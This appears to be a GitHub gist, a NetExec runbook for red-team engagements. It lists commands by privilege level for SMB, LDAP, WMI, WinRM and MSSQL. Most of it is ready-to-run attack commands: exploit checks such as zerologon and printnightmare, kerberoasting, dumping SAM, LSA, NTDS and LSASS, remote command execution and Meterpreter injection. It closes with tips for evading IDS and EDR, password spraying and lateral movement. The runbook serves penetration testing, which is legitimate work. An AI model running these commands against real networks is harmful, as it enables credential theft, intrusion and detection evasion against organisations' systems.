Created
November 8, 2024 17:11
-
-
Save nullenc0de/cfb6baa60fd399bfb54e5ce0abd5c7f1 to your computer and use it in GitHub Desktop.
NetExec Runbook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NetExec Runbook | |
| ## No Authentication (Anonymous) | |
| ### NFS Enumeration | |
| ```bash | |
| netexec nfs TARGET_HOST -u "" -p "" --shares | |
| netexec nfs TARGET_HOST -u "" -p "" --enum-shares | |
| ``` | |
| ### SMB Exploit Checks | |
| ```bash | |
| netexec smb TARGET_HOST -u '' -p '' -M zerologon | |
| netexec smb TARGET_HOST -u '' -p '' -M petitpotam | |
| ``` | |
| ## Low Privilege (Standard User) | |
| ### SMB Enumeration & Exploit Checks | |
| ```bash | |
| netexec smb TARGET_HOST -u USER -p PASS --shares | |
| netexec smb TARGET_HOST -u USER -p PASS --sessions | |
| netexec smb TARGET_HOST -u USER -p PASS --rid-brute | |
| netexec smb TARGET_HOST -u USER -p PASS -M enum_av | |
| netexec smb TARGET_HOST -u USER -p PASS -M printerbug | |
| netexec smb TARGET_HOST -u USER -p PASS -M printnightmare | |
| netexec smb TARGET_HOST -u USER -p PASS -M ioxidresolver | |
| netexec smb TARGET_HOST -u USER -p PASS -M ms17-010 | |
| ``` | |
| ### LDAP Enumeration & Attacks | |
| ```bash | |
| netexec ldap TARGET_HOST -u USER -p PASS --users | |
| netexec ldap TARGET_HOST -u USER -p PASS --groups | |
| netexec ldap TARGET_HOST -u USER -p PASS --asreproast /tmp/hashes.txt | |
| netexec ldap TARGET_HOST -u USER -p PASS --kerberoasting /tmp/hashes.txt | |
| netexec ldap TARGET_HOST -u USER -p PASS -M adcs | |
| netexec ldap TARGET_HOST -u USER -p PASS -M laps | |
| ``` | |
| ### WMI Exploits | |
| ```bash | |
| netexec wmi TARGET_HOST -u USER -p PASS -M ioxidresolver | |
| netexec wmi TARGET_HOST -u USER -p PASS -M zerologon | |
| ``` | |
| ### MSSQL Privesc Checks | |
| ```bash | |
| netexec mssql TARGET_HOST -u USER -p PASS -M mssql_priv | |
| ``` | |
| ## High Privilege (Administrative) | |
| ### SMB Credential Dumping & Lateral Movement | |
| ```bash | |
| netexec smb TARGET_HOST -u ADMIN -p PASS --sam | |
| netexec smb TARGET_HOST -u ADMIN -p PASS --lsa | |
| netexec smb TARGET_HOST -u ADMIN -p PASS --ntds | |
| netexec smb TARGET_HOST -u ADMIN -p PASS -M hash_spider | |
| netexec smb TARGET_HOST -u ADMIN -p PASS -M lsassy | |
| ``` | |
| ### SMB Command & PowerShell Execution | |
| ```bash | |
| netexec smb TARGET_HOST -u ADMIN -p PASS -x whoami | |
| netexec smb TARGET_HOST -u ADMIN -p PASS -X Get-Process | |
| ``` | |
| ### WinRM Credential Dumping & Execution | |
| ```bash | |
| netexec winrm TARGET_HOST -u ADMIN -p PASS -X whoami | |
| netexec winrm TARGET_HOST -u ADMIN -p PASS --sam | |
| ``` | |
| ### WMI Enumeration | |
| ```bash | |
| netexec wmi TARGET_HOST -u ADMIN -p PASS -M enum_dns | |
| netexec wmi TARGET_HOST -u ADMIN -p PASS -M get_netconnections | |
| ``` | |
| ### MSSQL Injection & Execution | |
| ```bash | |
| netexec mssql TARGET_HOST -u ADMIN -p PASS -X whoami | |
| netexec mssql TARGET_HOST -u ADMIN -p PASS -M met_inject | |
| netexec mssql TARGET_HOST -u ADMIN -p PASS -M nanodump | |
| ``` | |
| # NetExec Tips & Best Practices | |
| ## Avoiding Detection | |
| - Use the `--jitter` option to add randomized delays between requests to avoid triggering IPS/IDS | |
| ``` | |
| netexec --jitter 1-5 smb TARGET -u USER -p PASS | |
| ``` | |
| - Avoid using the same account for scanning large number of hosts. Distribute scans across multiple accounts. | |
| ## Targeted Enumeration | |
| - Use `--filter-shares READ WRITE` to only enumerate shares with read and write access | |
| - Grep and filter LDAP output to find specific users/groups of interest | |
| ``` | |
| netexec ldap TARGET -u USER -p PASS --users | grep -i admin | |
| ``` | |
| - Use `--continue-on-success` with password lists to stop spraying after a valid credential is found | |
| ## Automating with Scripts | |
| - Use the `-M` flag to specify a custom module from a script | |
| ``` | |
| netexec smb TARGET -u ADMIN -p PASS -M ~/custom_module.py | |
| ``` | |
| - Chain multiple NetExec commands together in a bash script to automate common enumeration tasks | |
| ## OPSEC Considerations | |
| - Use `{DNS}` to resolve hostnames through a different DNS server | |
| ``` | |
| netexec {DNS:xx.xx.xx.xx} smb TARGET -u USER -p PASS | |
| ``` | |
| - Be careful when using modules that create/modify files on the target (scuffy, drop-sc, etc.) as they may get flagged by AV/EDR | |
| - Clean up any files uploaded or created during your testing | |
| ## Offline Credential Attacks | |
| - Use `--asreproast` and `--kerberoasting` to dump hashes for offline cracking | |
| - Dump SAM/NTDS databases with `--sam` and `--ntds` and crack offline with Hashcat | |
| ## Lateral Movement | |
| - Use `hash_spider` module to scan the network and find systems where the compromised user has admin access | |
| - Use `-M lsassy` and `-M nanodump` to remotely dump LSASS without executing code on the target | |
| - Chain SMB `-M empire_exec` with MSSQL `-M met_inject` to laterally move and inject beacons | |
| ## Privilege Escalation | |
| - Always check for low-hanging fruit like `gpp_password`, `gpp_autologin`, and unattended installs | |
| - Abuse misconfigured service accounts and delegations with `--delegate` and `-M addcomputer` | |
| - Use `-M masky` to dump domain user creds through ADCS if a CA is accessible | |
| Hopefully these tips will help you get the most out of NetExec for your red team engagements and penetration tests! Let me know if you have any other NetExec tips to share. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment